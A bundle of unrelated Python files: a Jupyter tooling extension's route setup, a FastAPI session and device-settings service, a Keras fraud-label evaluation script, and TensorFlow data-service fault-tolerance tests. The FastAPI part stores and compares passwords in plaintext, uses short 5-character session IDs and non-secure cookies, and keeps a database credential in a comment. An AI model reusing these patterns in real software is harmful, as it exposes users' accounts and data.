    Perform the keyscan command to get the certificate fingerprint (of specified format [e.g. rsa256, ecdsa, ...]) of the container.
    # Arguments
    - host_name (string): hostname which to scan for a key
    - host_port (int): port which to scan for a key
    - key_format (string): type of the key to return. the `ssh-keyscan` command usually lists the fingerprint in different formats (e.g. ecdsa-sha2-nistp256, ssh-rsa, ssh-ed25519, ...). The ssh-keyscan result is grepped for the key_format, so already a part could match. In that case, the last match is used.
    # Returns
    The keyscan entry which can be added to the known_hosts file. If `key_format` matches multiple results of `ssh-keyscan`, the last match is returned. If no match exists, it returns empty
    """
    scan = subprocess.run(
        ["ssh-keyscan", "-p", str(host_port), host_name], stdout=subprocess.PIPE
    )
    matching_entry = ""
    for line in scan.stdout.decode("utf-8").split("\n"):
        if key_format in line:
            # keep overwriting so the LAST matching line wins
            matching_entry = line
    return matching_entry
# ------------- PLUGIN LOADER ------------------------
def load_jupyter_server_extension(nb_server_app) -> None:
    """Jupyter extension entry point: register all tooling REST handlers.

    Stores the app's web_app and log as module globals because the handler
    helpers above reference them directly.
    """
    # registers all handlers as a REST interface
    global web_app
    global log
    web_app = nb_server_app.web_app
    log = nb_server_app.log
    host_pattern = ".*$"
    # SharedSSHHandler
    route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/ping")
    web_app.add_handlers(host_pattern, [(route_pattern, PingHandler)])
    route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/tools")
    web_app.add_handlers(host_pattern, [(route_pattern, ToolingHandler)])
    route_pattern = url_path_join(
        web_app.settings["base_url"], "/tooling/tool-installers"
    )
    web_app.add_handlers(host_pattern, [(route_pattern, InstallToolHandler)])
    route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/token")
    web_app.add_handlers(host_pattern, [(route_pattern, SharedTokenHandler)])
    route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/git/info")
    web_app.add_handlers(host_pattern, [(route_pattern, GitInfoHandler)])
    route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/git/commit")
    web_app.add_handlers(host_pattern, [(route_pattern, GitCommitHandler)])
    web_app.add_handlers(
        host_pattern,
        [
            (
                url_path_join(web_app.settings["base_url"], "/tooling/storage/check"),
                StorageCheckHandler,
            )
        ],
    )
    route_pattern = url_path_join(
        web_app.settings["base_url"], "/tooling/ssh/setup-script"
    )
    web_app.add_handlers(host_pattern, [(route_pattern, SSHScriptHandler)])
    route_pattern = url_path_join(
        web_app.settings["base_url"], "/tooling/ssh/setup-command"
    )
    web_app.add_handlers(host_pattern, [(route_pattern, SSHCommandHandler)])
    route_pattern = url_path_join(web_app.settings["base_url"], "/tooling/files/link")
    web_app.add_handlers(host_pattern, [(route_pattern, SharedFilesHandler)])
    route_pattern = url_path_join(web_app.settings["base_url"], SHARED_SSH_SETUP_PATH)
    web_app.add_handlers(host_pattern, [(route_pattern, SharedSSHHandler)])
    log.info("Extension jupyter-tooling-widget loaded successfully.")
# Test routine. Can be invoked manually
# Test routine. Can be invoked manually
if __name__ == "__main__":
    application = tornado.web.Application([(r"/test", HelloWorldHandler)])
    # NOTE(review): port 555 is privileged (<1024) and needs root — confirm intended.
    application.listen(555)
    tornado.ioloop.IOLoop.current().start()
|
main.py | from typing import Optional
from pydantic import BaseModel
from fastapi import FastAPI, Response, Request, status
from fastapi import responses
from fastapi.responses import JSONResponse
from fastapi.middleware.cors import CORSMiddleware
from sqlalchemy import create_engine, Column, String, Integer, JSON, or_
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
import random
import string
from datetime import datetime, timedelta
import time
import uvicorn
#for multiprocesing
import threading
# Message of the day shown to clients.
MOTD = "Welcome to the site"
# Sessions expire after 30 idle minutes; the collector prunes every 60 seconds.
SESSION_TIMEOUT_PERIOD_MINUTES = 30
SESSION_COLLECTOR_PERIOD_SECONDS = 60
# Length of generated session ids (see sessIdGenerator).
SESSION_ID_SIZE_SYMBOLS = 5
#SQLALCHAMY_DATABASE_URL = 'mysql://remote_user:User_1234@192.168.0.105:3306/fastapi_test'
SQLALCHAMY_DATABASE_URL = 'sqlite:///site.db'
class session():
    """In-memory session record tied to a username and an absolute UTC expiry."""

    def __init__(self, sess_id, username, expire_time: datetime):
        self.sess_id = sess_id
        self.expire_time = expire_time
        self.username = username

    def isValid(self):
        """Return True while the current UTC time is strictly before the expiry."""
        return datetime.utcnow() < self.expire_time
class sessionManager():
    """Holds active sessions in memory and prunes expired ones via a daemon thread."""

    def _sessionCollectorThread(self, timeout):
        # Background loop: prune expired sessions, then sleep `timeout` seconds.
        while (self.runCollector):
            self.deleteInvalidSessions()
            time.sleep(timeout)

    def sessionCollectorStart(self, timeout):
        # Idempotent start: spawn the collector only if it is not already running.
        if self.runCollector is not True:
            self.runCollector = True
            self.collector = threading.Thread(target=self._sessionCollectorThread, daemon=True, args=(timeout,))
            self.collector.start()

    def sessionCollectorStop(self):
        # The collector thread exits after its current sleep cycle.
        self.runCollector = False

    def deleteInvalidSessions(self):
        # Iterate over a copy so removal during iteration is safe.
        for session in list(self.sessions):
            if session.isValid():
                pass
            else:
                self.sessions.remove(session)

    def getSessionByID(self, id):
        # Returns the matching valid session, or None; an expired match
        # triggers a full prune instead.
        sess = None
        for session in self.sessions:
            if session.sess_id == id:
                if session.isValid():
                    sess = session
                else:
                    self.deleteInvalidSessions()
                break
        return sess

    def addSession(self, session: session):
        self.sessions.append(session)

    def removeSessionById(self, id):
        # Iterate over a copy so removal during iteration is safe.
        for session in list(self.sessions):
            if session.sess_id == id:
                self.sessions.remove(session)
            else:
                pass

    def __init__(self):
        # sessions: list of `session` objects; runCollector gates the thread loop.
        self.sessions = []
        self.runCollector = False
def sessIdGenerator(N):
    """Return a cryptographically random ID of N uppercase letters/digits."""
    rng = random.SystemRandom()
    alphabet = string.ascii_uppercase + string.digits
    return ''.join([rng.choice(alphabet) for _ in range(N)])
class Credentials(BaseModel):
    """Request body for POST /login: plaintext username and password."""
    username:str
    password:str
class UpdateSetting(BaseModel):
    """Request body for PUT /user/settings/{id}.

    ``value`` is expected to carry the new value under a "value" key; its
    runtime type is checked against the target setting's type on update.
    """
    setting_id:int
    value:dict
Base = declarative_base()
class User(Base):
    """ORM model for the ``users`` table (username + password)."""
    __tablename__ = "users"
    username = Column(String, primary_key = True)
    # NOTE(review): passwords appear to be stored and compared in plaintext
    # (see /login) — they should be hashed; confirm before shipping.
    password = Column(String)
    def __init__(self, username, password):
        self.username = username
        self.password = password
class Setting(Base):
    """ORM model for the ``settings`` table: one configurable device value."""
    __tablename__ = "settings"
    setting_id = Column(Integer, primary_key = True, autoincrement = True)
    device_name = Column(String)
    setting_name = Column(String)
    # Type discriminator used by validateSettingUpdate ("integer"/"boolean").
    setting_type = Column(String)
    value = Column(JSON)
    def toDict(self):
        """Return a JSON-serializable dict of this setting's columns."""
        x = {
            "setting_id" : self.setting_id,
            "device_name" : self.device_name,
            "setting_name" : self.setting_name,
            "setting_type" : self.setting_type,
            "value" : self.value
            }
        return x
    def __init__(self, device_name, setting_name, setting_type, value):
        self.device_name = device_name
        self.setting_name = setting_name
        self.setting_type = setting_type
        self.value = value
class SettingAccess(Base):
    """ORM model granting a username access to one setting (by id)."""
    __tablename__ = "settings_access"
    id = Column(Integer, primary_key = True, autoincrement = True)
    setting_id = Column(Integer)
    username = Column(String)
    def __init__(self, setting_id, username):
        self.setting_id = setting_id
        self.username = username
class Device():
    """Groups a device name with the list of Setting objects attached to it."""

    def toDict(self):
        """Return a JSON-serializable dict view of this device.

        Builds a NEW list of setting dicts. The previous implementation
        aliased ``self.settings`` (``_settings = self.settings``) and
        overwrote its elements in place, destroying the Setting objects so
        a second ``toDict()`` call crashed on already-converted dicts.
        """
        return {
            "device_name" : self.name,
            "settings" : [s.toDict() for s in self.settings]
        }

    def __init__(self, name:string, settings:list):
        self.name = name
        self.settings = settings
# Module-level singletons: the in-memory session registry and one shared
# SQLAlchemy session bound to a local SQLite database.
sm = sessionManager()
#engine = create_engine(SQLALCHAMY_DATABASE_URL)
# check_same_thread=False allows the SQLite connection to be used from other
# threads. NOTE(review): sharing a single Session across request handlers is
# not thread-safe in general — confirm, or switch to a session-per-request.
engine = create_engine(SQLALCHAMY_DATABASE_URL, connect_args={"check_same_thread":False})
sqlSession= sessionmaker(bind=engine, autocommit=False,)()
def getSettingsForUserSortedByDevice(sess_id):
    """Return the session user's accessible settings grouped per device."""
    username = sm.getSessionByID(sess_id).username
    grants = sqlSession.query(SettingAccess).filter(
        SettingAccess.username == username).all()
    allowed_ids = [grant.setting_id for grant in grants]
    allowed = sqlSession.query(Setting).filter(
        Setting.setting_id.in_(allowed_ids)).all()

    # Group settings by device name, preserving first-seen device order.
    grouped = {}
    for setting in allowed:
        grouped.setdefault(setting.device_name, []).append(setting)

    devices = [Device(name, settings) for name, settings in grouped.items()]
    return [device.toDict() for device in devices]
def getAccessibleSettingsIds(sess_id):
    """Return the list of setting ids the session's user may access."""
    username = sm.getSessionByID(sess_id).username
    rows = sqlSession.query(SettingAccess).filter(
        SettingAccess.username == username).all()
    return [row.setting_id for row in rows]
def validateSettingUpdate(updatedSetting:UpdateSetting, s:Setting):
    """Check that the submitted value's runtime type matches the setting type.

    Exact type checks (``type(...) is``) are deliberate: a bool must not
    pass as an integer even though ``bool`` subclasses ``int``.
    """
    submitted = updatedSetting.value["value"]
    expected = s.setting_type
    if expected == "integer":
        return type(submitted) is int
    if expected == "boolean":
        return type(submitted) is bool
    return False
# Browser origins allowed by CORS (front-end development servers).
origins = [
    "http://127.0.0.1:3000",
    "http://192.168.1.201:3000"
]
app = FastAPI()
# allow_credentials=True is required so the SESS_ID cookie is sent cross-origin.
app.add_middleware(
    CORSMiddleware,
    allow_origins=origins,
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
@app.get("/", tags = ["general"])
def root(response: Response):
    """Landing endpoint: return the message of the day."""
    return {"motd": MOTD}
@app.post("/login", tags = ["authentication"])
def login(response:Response, credentials:Credentials):
    """Authenticate a user and issue a SESS_ID session cookie on success.

    Looks the user up by name, compares the stored password, and on a match
    registers an in-memory session whose lifetime matches the cookie expiry.
    Returns 401 with an identical body for unknown user and wrong password.
    """
    result = sqlSession.query(User).filter(User.username == credentials.username).first()
    # NOTE(review): passwords are compared in plaintext — they should be
    # hashed (e.g. bcrypt) before this ships.
    if result is None or result.password != credentials.password:
        response.status_code = status.HTTP_401_UNAUTHORIZED
        return {"status":"Wrong credentials"}

    sess_id = sessIdGenerator(SESSION_ID_SIZE_SYMBOLS)
    # Renamed from ``time`` — the original local shadowed the imported
    # ``time`` module inside this function.
    expire_time = datetime.utcnow() + timedelta(minutes = SESSION_TIMEOUT_PERIOD_MINUTES)
    # secure=False so the cookie also works over plain HTTP during development.
    response.set_cookie(key="SESS_ID", value=sess_id, expires = expire_time.ctime(),
                        samesite = "strict", secure = False)
    sm.addSession(session(sess_id, credentials.username, expire_time))
    sm.sessionCollectorStart(SESSION_COLLECTOR_PERIOD_SECONDS)
    return {"status":"Successful login"}
@app.get("/checksession", tags = ["authentication"])
def checkSession(request:Request, response:Response):
    """Report whether the request carries a valid SESS_ID cookie."""
    if "SESS_ID" not in request.cookies:
        response.status_code = status.HTTP_401_UNAUTHORIZED
        return {"status": "Invalid"}
    sess = sm.getSessionByID(request.cookies["SESS_ID"])
    if sess is None:
        response.status_code = status.HTTP_403_FORBIDDEN
        return {"status": "Invalid"}
    response.status_code = status.HTTP_200_OK
    return {"status" : "Valid", "username" : sess.username}
@app.post("/logout", tags = ["authentication"])
def logout(request:Request, response:Response):
    """Invalidate the caller's server-side session, if one exists."""
    if "SESS_ID" not in request.cookies:
        response.status_code = status.HTTP_401_UNAUTHORIZED
        return {"status": "No token applied to request"}
    sess = sm.getSessionByID(request.cookies["SESS_ID"])
    if sess is None:
        response.status_code = status.HTTP_404_NOT_FOUND
        return {"status": "Session not found"}
    response.status_code = status.HTTP_200_OK
    sm.removeSessionById(sess.sess_id)
    return {"status" : "Logged out", "username" : sess.username}
@app.get("/user", tags = ["user content"])
def userpage(request:Request, response:Response):
    """Return placeholder user data for an authenticated session."""
    if "SESS_ID" not in request.cookies:
        response.status_code = status.HTTP_401_UNAUTHORIZED
        return {"status": "No token applied to request"}
    if sm.getSessionByID(request.cookies["SESS_ID"]) is None:
        response.status_code = status.HTTP_403_FORBIDDEN
        return {"status": "No session"}
    response.status_code = status.HTTP_200_OK
    return {"userdata" : "This is test user data"}
@app.get("/user/settings", tags = ["user content"])
def userSettings(request:Request, response:Response):
    """Return the logged-in user's settings grouped by device."""
    if "SESS_ID" not in request.cookies:
        response.status_code = status.HTTP_401_UNAUTHORIZED
        return {"status": "No token applied to request"}
    sess_id = request.cookies["SESS_ID"]
    if sm.getSessionByID(sess_id) is None:
        response.status_code = status.HTTP_403_FORBIDDEN
        return {"status": "No session"}
    response.status_code = status.HTTP_200_OK
    return {"status" : "Success",
            "devices" : getSettingsForUserSortedByDevice(sess_id)}
@app.put("/user/settings/{id:int}", tags = ["user content"])
def updateSetting(updatedSetting:UpdateSetting, response:Response, request:Request, id):
    """Update one setting's value on behalf of the logged-in user.

    Requires a valid SESS_ID cookie, an access grant for the setting, and a
    submitted value whose runtime type matches the setting's declared type.
    """
    if "SESS_ID" not in request.cookies:
        response.status_code = status.HTTP_401_UNAUTHORIZED
        return {"status": "No token applied to request"}
    if sm.getSessionByID(request.cookies["SESS_ID"]) is None:
        response.status_code = status.HTTP_403_FORBIDDEN
        return {"status": "No session"}
    if id not in getAccessibleSettingsIds(request.cookies["SESS_ID"]):
        response.status_code = status.HTTP_403_FORBIDDEN
        return {"status" : "No user access to that setting"}
    # one_or_none() returns None for a missing row. The original used .one(),
    # which raises NoResultFound instead of returning None, so the intended
    # 404 branch was unreachable and surfaced as a 500.
    s = sqlSession.query(Setting).filter(Setting.setting_id == id).one_or_none()
    if s is None:
        response.status_code = status.HTTP_404_NOT_FOUND
        return {"status" : "No setting with that id"}
    if not validateSettingUpdate(updatedSetting, s):
        response.status_code = status.HTTP_422_UNPROCESSABLE_ENTITY
        return {"status" : "Invalid value type "}
    response.status_code = status.HTTP_200_OK
    s.value = updatedSetting.value
    sqlSession.commit()
    return {"status" : "Success"}
|
allofmethod.py | import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Dense
from keras.utils import to_categorical
import time
import multiprocessing as mp
start_time=time.time()
def deepl(location1,location2):
    """Train a dense softmax classifier on *location1*, label *location2*.

    Both CSVs must contain a 'typeoffraud' target column. Predicted labels
    for the second file are written to 'label.csv' in the working directory.
    """
    train_df = pd.read_csv(location1)
    train_cols = train_df.columns
    xtrain = train_df[train_cols[train_cols != 'typeoffraud']]
    ytrain = to_categorical(train_df['typeoffraud'])

    test_df = pd.read_csv(location2)
    test_cols = test_df.columns
    xtest = test_df[test_cols[test_cols != 'typeoffraud']]
    ytest = to_categorical(test_df['typeoffraud'])

    # Z-score normalisation, each frame against its own statistics.
    xtrain_norm = (xtrain - xtrain.mean()) / xtrain.std()
    xtest_norm = (xtest - xtest.mean()) / xtest.std()

    n_cols = xtrain_norm.shape[1]
    num_classes = ytrain.shape[1]

    # Two hidden ReLU layers feeding a softmax over the fraud classes.
    model = Sequential()
    model.add(Dense(100, activation='relu', input_shape=(n_cols,)))
    model.add(Dense(100, activation='relu'))
    model.add(Dense(num_classes, activation='softmax'))
    model.compile(optimizer='adam', loss='categorical_crossentropy',
                  metrics=['accuracy'])

    model.fit(xtrain_norm, ytrain, validation_data=(xtest_norm, ytest),
              epochs=10, verbose=1)

    predictions = np.argmax(model.predict(xtest_norm), axis=1)
    out = pd.DataFrame(data=list(zip(predictions)), columns=['label'])
    out.to_csv('label.csv', index=False)
################################################################################################################
def maketags(location2,location3):
    """Split ground-truth and predicted fraud labels into per-role CSVs.

    From *location2* (ground truth; 'typeoffraud' in 1..6, ids in column 1,
    tags in column 4) writes labelofhead.csv / labelofcol.csv. Pairs the
    truth ids with the predictions in *location3* into labelofmethod.csv,
    then splits that file the same way into labelofheadM.csv / labelofcolM.csv.
    """
    truth = pd.read_csv(location2)

    head_ids, head_tags = [], []
    col_ids, col_tags = [], []
    for row_idx, label in enumerate(truth['typeoffraud']):
        # Labels 1-3 mark "head" fraud, 4-6 mark "colleague" fraud.
        if label in (1, 2, 3):
            head_ids.append(truth.iloc[row_idx, 1])
            head_tags.append(truth.iloc[row_idx, 4])
        if label in (4, 5, 6):
            col_ids.append(truth.iloc[row_idx, 1])
            col_tags.append(truth.iloc[row_idx, 4])

    pd.DataFrame(data=list(zip(head_ids, head_tags)),
                 columns=['ids', 'tags']).to_csv('labelofhead.csv', index=False)
    pd.DataFrame(data=list(zip(col_ids, col_tags)),
                 columns=['ids', 'tags']).to_csv('labelofcol.csv', index=False)

    predicted = pd.read_csv(location3)
    pairs = list(zip(list(truth['ids']), list(predicted['label'])))
    pd.DataFrame(data=pairs, columns=['ids', 'tags']).to_csv(
        'labelofmethod.csv', index=False)

    method = pd.read_csv('labelofmethod.csv')
    head_ids_m, head_tags_m = [], []
    col_ids_m, col_tags_m = [], []
    for row_idx, label in enumerate(method['tags']):
        if label in (1, 2, 3):
            head_ids_m.append(method.iloc[row_idx, 0])
            head_tags_m.append(method.iloc[row_idx, 1])
        if label in (4, 5, 6):
            col_ids_m.append(method.iloc[row_idx, 0])
            col_tags_m.append(method.iloc[row_idx, 1])

    pd.DataFrame(data=list(zip(head_ids_m, head_tags_m)),
                 columns=['ids', 'tags']).to_csv('labelofheadM.csv', index=False)
    pd.DataFrame(data=list(zip(col_ids_m, col_tags_m)),
                 columns=['ids', 'tags']).to_csv('labelofcolM.csv', index=False)
########################################################################################################
def evalofhead(location4,location5):
    """Print precision/recall/F1 of head-fraud detection.

    *location4* holds the ground-truth ids, *location5* the detected ids;
    both CSVs need an 'ids' column. Raises ZeroDivisionError when a
    denominator is zero (same as the original behavior).
    """
    truth_ids = list(pd.read_csv(location4)['ids'])
    found_ids = list(pd.read_csv(location5)['ids'])
    # Set lookups turn the original O(n*m) list-membership scans into
    # O(n+m); iterating the lists keeps duplicate handling identical.
    truth_set = set(truth_ids)
    found_set = set(found_ids)
    tp = sum(1 for item in truth_ids if item in found_set)
    fn = len(truth_ids) - tp
    fp = sum(1 for item in found_ids if item not in truth_set)
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f = 2 * ((precision * recall) / (precision + recall))
    print("%s :precision for head detection"%precision)
    print("%s :recall for head detection"%recall)
    print("%s :f-measure for head detection"%f)
############################################################################################################
def evalofcol(location6,location7):
    """Print precision/recall/F1 of colleague-fraud detection.

    *location6* holds the ground-truth ids, *location7* the detected ids;
    both CSVs need an 'ids' column. Raises ZeroDivisionError when a
    denominator is zero (same as the original behavior).
    """
    truth_ids = list(pd.read_csv(location6)['ids'])
    found_ids = list(pd.read_csv(location7)['ids'])
    # Set lookups turn the original O(n*m) list-membership scans into
    # O(n+m); iterating the lists keeps duplicate handling identical.
    truth_set = set(truth_ids)
    found_set = set(found_ids)
    tp = sum(1 for item in truth_ids if item in found_set)
    fn = len(truth_ids) - tp
    fp = sum(1 for item in found_ids if item not in truth_set)
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f = 2 * ((precision * recall) / (precision + recall))
    print("%s :precision for colleague detection"%precision)
    print("%s :recall for colleague detection"%recall)
    print("%s :f-measure for colleague detection"%f)
############################################################################################################
# File locations shared by the pipeline stages below.
location1="dataforDl.csv"
location2="dataforDl1.csv"
location3='label.csv'
location4="labelofhead.csv"
location5="labelofheadM.csv"
location6="labelofcol.csv"
location7="labelofcolM.csv"

if __name__ == '__main__':
    # The __main__ guard is required when using multiprocessing: on
    # spawn-based platforms (Windows, macOS) each child re-imports this
    # module, and without the guard it would fork again recursively.
    p1 = mp.Process(target=deepl, args=(location1, location2))
    p1.start()
    p1.join()
    p2 = mp.Process(target=maketags, args=(location2, location3))
    p2.start()
    p2.join()
    evalofhead(location4, location5)
    evalofcol(location6, location7)
    print('---%s seconds---'%(time.time()-start_time))
data_service_ops_ft_test.py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops where servers are started late or preempted."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests import data_service_test_base
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
TMP_WORK_DIR = data_service_test_base.TMP_WORK_DIR
NO_WORK_DIR = data_service_test_base.NO_WORK_DIR
class DataServiceOpsTest(data_service_test_base.TestBase,
                         parameterized.TestCase):
  """Fault-tolerance tests for the tf.data service.

  Covers dispatcher/worker stops and restarts, late server startup, and
  adding workers while a job is running.
  """

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherStop(self):
    """Reads continue from the worker after the dispatcher dies."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    ds = self.make_distributed_range_dataset(num_elements, cluster)
    iterator = iter(ds)
    results = []
    results.append(next(iterator).numpy())
    cluster.stop_dispatcher()
    # After the dispatcher dies, the worker should continue providing the rest
    # of the dataset's elements.
    for _ in range(num_elements - 1):
      results.append(next(iterator).numpy())
    self.assertEqual(results, list(range(num_elements)))

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherRestartBeforeReading(self):
    """A dispatcher restart before the first read is transparent."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    ds = self.make_distributed_range_dataset(num_elements, cluster)
    cluster.restart_dispatcher()
    self.assertDatasetProduces(ds, list(range(num_elements)))

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherRestartDuringReading(self):
    """A mid-iteration dispatcher restart does not lose or repeat elements."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    ds = self.make_distributed_range_dataset(num_elements, cluster)
    iterator = iter(ds)
    results = []
    for _ in range(num_elements // 2):
      results.append(next(iterator).numpy())
    cluster.restart_dispatcher()
    for elem in iterator:
      results.append(elem.numpy())
    self.assertEqual(list(range(num_elements)), results)

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherRestartDuringDistributedEpoch(self):
    """Same as above, but under distributed_epoch processing mode."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    ds = self.make_distributed_range_dataset(
        num_elements, cluster, processing_mode="distributed_epoch")
    iterator = iter(ds)
    results = []
    for _ in range(num_elements // 2):
      results.append(next(iterator).numpy())
    cluster.restart_dispatcher()
    for elem in iterator:
      results.append(elem.numpy())
    self.assertEqual(list(range(num_elements)), results)

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherRestartDuringDistributedEpochRepeat(self):
    """Restarts the dispatcher several times across a repeated dataset."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    repetitions = 5
    breakpoints = [50, 250, 450, 500]
    ds = dataset_ops.Dataset.range(num_elements)
    ds = ds.repeat(repetitions)
    ds = self.make_distributed_dataset(
        ds, cluster, processing_mode="distributed_epoch")
    iterator = iter(ds)
    results = []
    # NOTE(review): the loop variable shadows the ``breakpoint`` builtin.
    for breakpoint in breakpoints:
      for _ in range(len(results), breakpoint):
        results.append(next(iterator).numpy())
      cluster.restart_dispatcher()
    self.assertCountEqual(repetitions * list(range(num_elements)), results)

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherRestartBetweenIterations(self):
    """The same dataset is re-iterable across a dispatcher restart."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    ds = self.make_distributed_range_dataset(100, cluster)
    self.assertDatasetProduces(ds, list(range(num_elements)))
    cluster.restart_dispatcher()
    self.assertDatasetProduces(ds, list(range(num_elements)))

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherManyRestarts(self):
    """Datasets registered before each restart remain readable."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements_start = 10
    num_elements_end = 15
    datasets = []
    for num_elements in range(num_elements_start, num_elements_end):
      datasets.append(
          self.make_distributed_range_dataset(num_elements, cluster))
      cluster.restart_dispatcher()
    for ds, num_elements in zip(datasets,
                                range(num_elements_start, num_elements_end)):
      self.assertDatasetProduces(ds, list(range(num_elements)))

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherAndWorkerRestart(self):
    """Restarting both dispatcher and worker between epochs is transparent."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    ds = self.make_distributed_range_dataset(num_elements, cluster)
    cluster.restart_dispatcher()
    cluster.workers[0].restart()
    self.assertDatasetProduces(ds, list(range(num_elements)))
    cluster.restart_dispatcher()
    cluster.workers[0].restart()
    self.assertDatasetProduces(ds, list(range(num_elements)))

  @combinations.generate(
      combinations.times(test_base.eager_only_combinations(),
                         combinations.combine(workers_to_add=[1, 3, 10])))
  def testRoundRobinAddWorkers(self, workers_to_add):
    """New workers joining mid-job participate in round-robin reads."""
    starting_workers = 3
    cluster = data_service_test_base.TestCluster(num_workers=starting_workers)
    # Round robin reads can cause slow cluster shutdown.
    data_service_test_base.GLOBAL_CLUSTERS.add(cluster)
    num_consumers = 7
    ds = self.make_round_robin_dataset(cluster, num_consumers)
    get_next = self.getNext(ds, requires_initialization=True)
    results = []
    zeros_seen = 0
    for _ in range(50):
      results.append(self.evaluate(get_next()))
      if results[-1] == 0:
        zeros_seen += 1
    for _ in range(workers_to_add):
      cluster.add_worker()
    # Read until all new workers have joined.
    while zeros_seen < starting_workers + workers_to_add:
      results.append(self.evaluate(get_next()))
      if results[-1] == 0:
        zeros_seen += 1
    # Read some more.
    for _ in range(100):
      results.append(self.evaluate(get_next()))
    self.checkRoundRobinGroups(results, num_consumers)

  @combinations.generate(test_base.eager_only_combinations())
  def testRoundRobinRestartWorker(self):
    """Round-robin reads survive a worker stop/restart."""
    num_workers = 3
    # Set a shutdown quiet period to prevent workers from shutting down partway
    # through a round.
    cluster = data_service_test_base.TestCluster(
        num_workers, worker_shutdown_quiet_period_ms=2000)
    # Round robin reads can cause slow cluster shutdown.
    data_service_test_base.GLOBAL_CLUSTERS.add(cluster)
    num_consumers = 5
    ds = self.make_round_robin_dataset(cluster, num_consumers)
    get_next = self.getNext(ds, requires_initialization=True)
    results = []
    self.read(get_next, results, 100)
    cluster.workers[1].stop()
    # Check that we can continue to read even with a worker stopped.
    self.read(get_next, results, 100)
    cluster.workers[1].restart()
    # Read until we get results from the restarted worker, then read some more.
    while results[-1] != 0:
      results.append(self.evaluate(get_next()))
    self.read(get_next, results, 100)
    self.checkRoundRobinGroups(results, num_consumers)

  @combinations.generate(test_base.eager_only_combinations())
  def testRoundRobinMultiStartStop(self):
    """Round-robin reads survive repeated worker churn and a dispatcher restart."""
    num_workers = 3
    # Set a shutdown quiet period to prevent workers from shutting down partway
    # through a round.
    cluster = data_service_test_base.TestCluster(
        num_workers, worker_shutdown_quiet_period_ms=2000)
    # Round robin reads can cause slow cluster shutdown.
    data_service_test_base.GLOBAL_CLUSTERS.add(cluster)
    num_consumers = 5
    ds = self.make_round_robin_dataset(cluster, num_consumers)
    get_next = self.getNext(ds, requires_initialization=True)
    results = []
    self.read(get_next, results, 100)
    for i in range(num_workers):
      cluster.workers[i].stop()
      self.read(get_next, results, 100)
      cluster.workers[i].restart()
    self.read(get_next, results, 100)
    cluster.add_worker()
    cluster.restart_dispatcher()
    for i in range(num_workers):
      cluster.workers[i].stop()
    self.read(get_next, results, 100)
    self.checkRoundRobinGroups(results, num_consumers)

  @combinations.generate(test_base.eager_only_combinations())
  def testDispatcherAndMultiWorkerRestart(self):
    """Restarting the dispatcher and every worker re-produces all elements."""
    num_workers = 2
    cluster = data_service_test_base.TestCluster(num_workers=num_workers)
    num_elements = 100
    ds = self.make_distributed_range_dataset(num_elements, cluster)
    iterator = iter(ds)
    results = []
    cluster.restart_dispatcher()
    for worker_index in range(num_workers):
      cluster.workers[worker_index].restart()
    for elem in iterator:
      results.append(elem.numpy())
    self.assertCountEqual(num_workers * list(range(num_elements)), results)
    cluster.restart_dispatcher()
    for worker_index in range(num_workers):
      cluster.workers[worker_index].restart()
    for elem in iterator:
      results.append(elem.numpy())
    self.assertCountEqual(num_workers * list(range(num_elements)), results)

  @combinations.generate(test_base.eager_only_combinations())
  def testStartServersLate(self):
    # Test that the data service client performs retries instead of failing when
    # the dataset is created before the master and worker are started.
    try:
      import portpicker  # pylint: disable=g-import-not-at-top
      dispatcher_port = portpicker.pick_unused_port()
    except:
      raise self.skipTest("Flakes in portpicker library do not represent "
                          "TensorFlow errors.")
    cluster = data_service_test_base.TestCluster(
        num_workers=1, dispatcher_port=dispatcher_port, start=False)

    def start_servers():
      time.sleep(0.5)
      cluster.start_dispatcher()
      cluster.start_workers()

    start_servers_thread = threading.Thread(target=start_servers, daemon=True)
    start_servers_thread.start()
    num_elements = 10
    ds = self.make_distributed_range_dataset(num_elements, cluster)
    results = [elem.numpy() for elem in ds]
    self.assertEqual(list(range(num_elements)), results)
    start_servers_thread.join()

  @combinations.generate(test_base.eager_only_combinations())
  def testAddWorkerMidJob(self):
    """A worker added mid-job contributes a full copy of the dataset."""
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
